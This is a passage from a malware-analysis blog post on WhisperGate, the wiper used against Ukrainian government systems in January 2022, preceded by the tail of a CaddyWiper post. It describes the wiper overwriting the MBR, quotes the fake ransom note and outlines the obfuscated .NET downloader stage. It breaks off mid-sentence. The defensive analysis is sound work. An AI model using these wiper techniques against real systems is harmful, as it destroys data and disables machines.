Discovery</span></a></p></td></tr><tr style="height: 24.75pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Impact</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://attack.mitre.org/techniques/T1485/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">T1485 – Data Destruction</span></a></p><br /><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://attack.mitre.org/techniques/T1529/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">T1529 – System Shutdown/Reboot</span></a></p></td></tr></tbody></table></div><br /><br /><h2 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 16pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">References</span></h2><ol style="margin-bottom: 0px; margin-top: 0px; padding-inline-start: 48px;"><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: decimal; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://www.bleepingcomputer.com/news/security/new-caddywiper-data-wiping-malware-hits-ukrainian-networks/" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://www.bleepingcomputer.com/news/security/new-caddywiper-data-wiping-malware-hits-ukrainian-networks/</span></a><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: decimal; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://www.virustotal.com/gui/file/a294620543334a721a2ae8eaaf9680a0786f4b9a216d75b55cfd28f39e9430ea/details" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://www.virustotal.com/gui/file/a294620543334a721a2ae8eaaf9680a0786f4b9a216d75b55cfd28f39e9430ea/details</span></a></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: decimal; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://app.any.run/tasks/399165f5-4f4d-417f-93dd-077718d81512/" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://app.any.run/tasks/399165f5-4f4d-417f-93dd-077718d81512/</span></a><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span></p></li></ol></span>Alexander Adamovhttp://www.blogger.com/profile/10336415028200154730noreply@blogger.com0tag:blogger.com,1999:blog-4482404627541610819.post-88510594800683141252022-01-26T11:20:00.017-08:002022-03-17T23:23:17.020-07:00Analysis of WhisperGate<p><img height="647" src="https://lh6.googleusercontent.com/63G4wuVNdgkBVrdR4WddVkmB3jN8erVT9TpHIhDGwWMXjVvtwh67tno6m_IqeQCEHbaR3Ie6PP6tH068AXELalZ38PuemlQIPrnZ8weBd6FVZSBaQcEJJ9syQHdUTZRh4hS1swox" style="font-family: Arial; font-size: 14.6667px; margin-left: 0px; margin-top: 0px; text-align: center; white-space: pre-wrap;" width="624" /> </p><p><span style="font-family: Arial; font-size: 16pt; text-align: justify; white-space: pre-wrap;">Summary of the attack</span></p><span id="docs-internal-guid-c6f295ee-7fff-8260-54e9-28b726a3bd6a"><ul style="margin-bottom: 0px; margin-top: 0px; padding-inline-start: 48px;"><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Name: WhisperGate</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Discovered in January 2022</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Used in a targeted attack against the Ukrainian government websites on the 14th of January, 2022</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Overwrites the contents of files with the fixed number of bytes</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Rewrites MBR, corrupts victims’ files, downloads and drops its own files</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Corrupted files have a random 4-byte extension</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Comes with 2 stages, PE64 written in C++ and .NET application with fake digital signatures</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The third stage is .NET DLL, which is downloaded at runtime</span></p></li></ul><div style="text-align: justify;"><i style="font-family: Arial; font-size: 14.6667px; text-align: right; white-space: pre-wrap;"><br /></i></div><div style="text-align: justify;"><i style="font-family: Arial; font-size: 14.6667px; text-align: right; white-space: pre-wrap;"><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span>by Denis Popov and Alexander Adamov</i></div><h2 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt; text-align: justify;"><span><a name='more'></a></span></h2><h2 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt; text-align: justify;"><span style="font-family: Arial; font-size: 16pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Introduction</span></h2><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">On January 13, 2022, multiple government sites in Ukraine were shut down due to a large-scale cyberattack by WhisperGate malware. In particular, the websites of the Cabinet of Ministers, the Ministry of Foreign Affairs, the Ministry of Sports, the Ministry of Energy, the Ministry of Agrarian Policy, the Ministry of Veterans Affairs, the website of the State Treasury, and state services website Diya stopped working. All users received a note with the following warning:</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><i></i></span></p><blockquote><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><i>"Ukrainian! All your personal data has been uploaded to the public network. All data on the computer is destroyed, it is impossible to recover them. All information about you has become public, be afraid and expect the worst. This is for your past, present and future. For Volyn, for the OUN UPA, for Galicia, for Polissya, and for historical lands."</i></span></p></blockquote><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Microsoft intelligence named this activity "DEV-0586" and identified it as destructive malware that used to be ransomware. Its main purpose is to disrupt the system and damage files beyond the possibility of their recovery.</span></p><h2 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt;"><span style="font-family: Arial; font-size: 16pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Technical Details</span></h2><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt; text-align: justify;"><span style="color: #434343; font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Deface of the government websites</span></h3><p style="text-align: left;"><span style="color: #141519; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-align: justify; vertical-align: baseline; white-space: pre-wrap;">Two types of deface attacks have been discovered by CERT-UA:</span></p><p style="text-align: left;"></p><ul style="text-align: left;"><li><span style="color: #141519; font-family: Arial; font-size: 14.6667px; font-variant-east-asian: normal; font-variant-numeric: normal; text-align: justify; vertical-align: baseline; white-space: pre-wrap;">Complete replacement of the main page (index.php)</span></li><li><span style="color: #141519; font-family: Arial; font-size: 14.6667px; font-variant-east-asian: normal; font-variant-numeric: normal; text-align: justify; vertical-align: baseline; white-space: pre-wrap;">Injection of a malicious script to the website that replaces its content</span></li></ul><span style="color: #141519; font-family: Arial; font-size: 14.6667px; font-variant-east-asian: normal; font-variant-numeric: normal; text-align: justify; vertical-align: baseline; white-space: pre-wrap;"></span><p></p><p style="text-align: left;"><span style="color: #141519; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-align: justify; vertical-align: baseline; white-space: pre-wrap;">The supposed attack vectors are:</span></p><p style="text-align: left;"></p><ul style="text-align: left;"><li><span style="color: #141519; font-family: Arial; font-size: 14.6667px; font-variant-east-asian: normal; font-variant-numeric: normal; text-align: justify; vertical-align: baseline; white-space: pre-wrap;">supply chain attack</span></li><li><span style="color: #141519; font-family: Arial; font-size: 14.6667px; font-variant-east-asian: normal; font-variant-numeric: normal; text-align: justify; vertical-align: baseline; white-space: pre-wrap;">the exploitation of OctoberCMS and/or Log4j vulnerabilities</span></li></ul><div style="text-align: justify;"><span style="color: #141519; font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">The traces of the commands executed by the attackers are shown below:</span></span></div><span style="color: #141519; font-family: Arial; font-size: 14.6667px; font-variant-east-asian: normal; font-variant-numeric: normal; text-align: justify; vertical-align: baseline; white-space: pre-wrap;"></span><p></p><div style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiEIrTISpgDQnyW5Maa_RpfRLt6-869XOyafVHknOFG7Sx2PRrZkK5d3ORW-9EaUcLKi7oAE82OQafASfw00PGiNyg7Bm-aktq2V2skcepjwRgd6ZhfN5BxXDtuNyfbeCSujoSTSa-EXnErw26HygeY8un-EhlKEIvYyAixQolzuG4vPpTTZ1klcCPbmA" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="232" data-original-width="609" src="https://blogger.googleusercontent.com/img/a/AVvXsEiEIrTISpgDQnyW5Maa_RpfRLt6-869XOyafVHknOFG7Sx2PRrZkK5d3ORW-9EaUcLKi7oAE82OQafASfw00PGiNyg7Bm-aktq2V2skcepjwRgd6ZhfN5BxXDtuNyfbeCSujoSTSa-EXnErw26HygeY8un-EhlKEIvYyAixQolzuG4vPpTTZ1klcCPbmA=s16000" /></a></div><div style="text-align: center;"><em style="background-color: white; box-sizing: border-box; color: #212529; font-family: ProbaPro, sans-serif; letter-spacing: 0.32px;">.bash_history (source: </em><span style="letter-spacing: 0.32px; text-align: left;"><span face="ProbaPro, sans-serif" style="color: #212529;"><i>https://cert.gov.ua/article/18101</i></span></span><em style="background-color: white; box-sizing: border-box; color: #212529; font-family: ProbaPro, sans-serif; letter-spacing: 0.32px;">)</em></div></div><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt; text-align: justify;"><span style="color: #434343; font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">MBR Writer (stage1.exe)</span></h3><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 11pt 0pt; text-align: justify;"><span style="color: #141519; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The threat actor uses Impacket tools collection to </span><span style="color: #222222; font-family: Arial; font-size: 11.5pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">lateral movement and malware execution</span><span style="color: #141519; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">.</span><span style="background-color: transparent; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> The first file ‘stage1.exe’ is a PE64 executable written in C++ and compiled with the MinGW compiler. </span><span style="color: #141519; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> This file can be placed in different directories, for example, C:\PerfLogs, C:\ProgramData, C:\, C:\temp. At the beginning of execution, malware obtains access to the </span><span style="color: #141519; font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">‘\\\\.\\PhysicalDrive0’</span><span style="color: #141519; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">, which contains the Master Boot Record (MBR). Then it writes the hardcoded ransom note to the MBR area as well as to every 199th sector of the disk. Since it was changed, after rebooting the system won’t be started, instead, the ransom note will be displayed.</span></p><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 0pt 0pt 11pt; text-align: justify;"><span style="color: #141519; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The hardcoded ransom note:</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"></span></p><blockquote><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Your hard drive has been corrupted.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">In case you want to recover all hard drives</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">of your organization,</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">You should pay us $10k via bitcoin wallet</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">1AVNM68gj6PGPFcJuftKATa4WLnzg8fpfv and send message via</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">tox ID 8BEDC411012A33BA34F49130D0F186993C6A32DAD8976F6A5D82C1ED23054C057ECED5496F65</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">with your organization name.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">We will contact you to give further instructions.</span></p></blockquote><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"></span></p><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 11pt 0pt; text-align: justify;"><span style="color: #141519; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 251px; overflow: hidden; width: 624px;"><img height="251" src="https://lh6.googleusercontent.com/7hgfqCHnJSQeBBefC4K68Un_LNbdDy7RNjxWrVwMHipbV55MmyjyVNnTXTQiMGbShXtay-KnUcGRlzdrai37IbGM5-IOz816fAty8Rhtq0S85PUHbUNZ3kxWXKgYpcoT_2BcIrO1" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjh4pONnoH7TmVaJ2W22MnfFNCyrH43pr0EIqmD-26fcd5EpFMhfjkGscxy5WCkR60H-ZgaDH6S7WuHw8-Iv2f-O0ROYGWjJfeAG3lukfaM88yhmVJ9SUMJO-o9snkbi84rNDJfcHgc4GwU/" style="background-color: transparent; margin-left: 1em; margin-right: 1em; text-align: left;"><img alt="" data-original-height="551" data-original-width="1002" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjh4pONnoH7TmVaJ2W22MnfFNCyrH43pr0EIqmD-26fcd5EpFMhfjkGscxy5WCkR60H-ZgaDH6S7WuHw8-Iv2f-O0ROYGWjJfeAG3lukfaM88yhmVJ9SUMJO-o9snkbi84rNDJfcHgc4GwU/s16000/RansomNoteSpraying.png" /></a><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvkAIe2UMIfZ51cwpWmPkZH2JC6eivNTx47nRNs5woKPSOwF9xMMr5HSFmqYXrHZll6_Wpa8XCO1cD345P6Iij3BlHpNnQcnZYcliO4ira9ZoG14Af00upIR88P7NglK1Fp-FbDjwsbfmR/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="32" data-original-width="1096" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvkAIe2UMIfZ51cwpWmPkZH2JC6eivNTx47nRNs5woKPSOwF9xMMr5HSFmqYXrHZll6_Wpa8XCO1cD345P6Iij3BlHpNnQcnZYcliO4ira9ZoG14Af00upIR88P7NglK1Fp-FbDjwsbfmR/s16000/WritingPhysicalDrive0-Monitor.png" /></a><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;">Obtaining access to the MBR and rewriting it</span> </div></span><p></p><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 0pt 0pt 11pt; text-align: justify;"><span style="color: #141519; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">This behavior isn’t typically used by ransomware whose main purpose is to encrypt files and demand a ransom to decrypt them, usually saving the system workability. In this case, malware changes the MBR, which causes the system not to start. This means that the ransom note is a fake and the main purpose of the malware is to disrupt systems operability.</span></p><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 0pt 0pt 11pt; text-align: justify;"><span style="color: #141519; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The traces of stage1.exe execution discovered by CERT-UA are shown below:</span></p><div class="separator" style="clear: both; text-align: center;"><span style="color: #141519; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhs5KYKJqWmbHbtlKHX4ybPXy3b6HJptrAR3c0MFUOPQMi0cobffOuYVP3Ys8ekAsP_wHKK2CoepDiSEQmZ-y36_BFn4JFpFDnGMJqvjlOOFS-4grDGmeAG0w6x6qdbcENmYsXvd1Ah0EW_hyNDb6xXkYitE_xLHssDEIe5PwRiyrUtgOsEygazDfnUxg" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="518" data-original-width="621" src="https://blogger.googleusercontent.com/img/a/AVvXsEhs5KYKJqWmbHbtlKHX4ybPXy3b6HJptrAR3c0MFUOPQMi0cobffOuYVP3Ys8ekAsP_wHKK2CoepDiSEQmZ-y36_BFn4JFpFDnGMJqvjlOOFS-4grDGmeAG0w6x6qdbcENmYsXvd1Ah0EW_hyNDb6xXkYitE_xLHssDEIe5PwRiyrUtgOsEygazDfnUxg=s16000" /></a></span></div><span style="color: #141519; font-family: Arial; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;"><span style="color: black; font-family: "Times New Roman"; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-align: center; vertical-align: baseline; white-space: normal;"><div><em style="background-color: white; box-sizing: border-box; color: #212529; font-family: ProbaPro, sans-serif; letter-spacing: 0.32px;">stage1.exe execution (source: </em><span style="letter-spacing: 0.32px; text-align: left;"><span face="ProbaPro, sans-serif" style="color: #212529;"><i>https://cert.gov.ua/article/18101</i></span></span><em style="background-color: white; box-sizing: border-box; color: #212529; font-family: ProbaPro, sans-serif; letter-spacing: 0.32px;">)</em></div></span><div style="text-align: center;"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></div></span><p></p><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 0pt 0pt 11pt; text-align: justify;"> <span style="background-color: transparent; color: #434343; font-family: Arial; font-size: 14pt; white-space: pre-wrap;">Trojan-Downloader (stage2.exe)</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The second file ‘stage2.exe’ is a .NET application, which contains a Microsoft Windows signature supposedly taken from the Russian version of Windows Explorer according to the properties in File </span><span style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;">Details</span><span style="font-family: Arial; font-size: 11pt; white-space: pre-wrap;">. Also, this file is obfuscated with Ezfuscator.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"></span></p><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhb9XTpAVCHpHTHQ8pru9_Eu0J7H7Z11OjUXIULblfBmrlaUI4cjbBNYllsKRkPyjmjDsYQAnon7zbuTfl0DWnqS2eqQJBS1yh4dgxSSDwPFeOa02x0vwk-6Ts_EVk9mMBJytj3wwq-0y6v/" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img alt="" data-original-height="480" data-original-width="404" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhb9XTpAVCHpHTHQ8pru9_Eu0J7H7Z11OjUXIULblfBmrlaUI4cjbBNYllsKRkPyjmjDsYQAnon7zbuTfl0DWnqS2eqQJBS1yh4dgxSSDwPFeOa02x0vwk-6Ts_EVk9mMBJytj3wwq-0y6v/s16000/CertInvalid.png" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"></td></tr></tbody></table><br /><p></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 203px; overflow: hidden; width: 624px;"><img height="203" src="https://lh4.googleusercontent.com/DmFff-qBodjd6u6PSC-ZUnnU-rS51yxTQGfivC1DdBZj5tB8nknvaIZ7svgibTCWbpapQIxuMSAePMUgOzv4FhAOckEKTaWt4DWHncAamvjBbENmAmZ0Bv1SnZHYY5V3qq_2OdoW" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiG35IHkTGlYqoj5sxFnwxwgG1AwLRV22Ftg6PEfKdD9PwAr1LD-xHeWGQeT36J7aMrBJ9tPxd6dj9xp9XUBR089Qrkw4pqfsVH6kh2RGzU1tH9YcoYeVd4EGAfpLldVYJrxB5jof9T5ySW/" style="font-size: 11pt; margin-left: 1em; margin-right: 1em; text-align: center;"><img data-original-height="525" data-original-width="402" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiG35IHkTGlYqoj5sxFnwxwgG1AwLRV22Ftg6PEfKdD9PwAr1LD-xHeWGQeT36J7aMrBJ9tPxd6dj9xp9XUBR089Qrkw4pqfsVH6kh2RGzU1tH9YcoYeVd4EGAfpLldVYJrxB5jof9T5ySW/s16000/Explorer_details.png" /></a></p><p></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: white; color: #141519; font-family: Arial; font-size: 11pt; text-align: justify; white-space: pre-wrap;">It’s used to download the <i>File Corrupter</i> and contains a hardcoded Discord link:</span></p><p dir="ltr" style="background-color: white; line-height: 1.38; 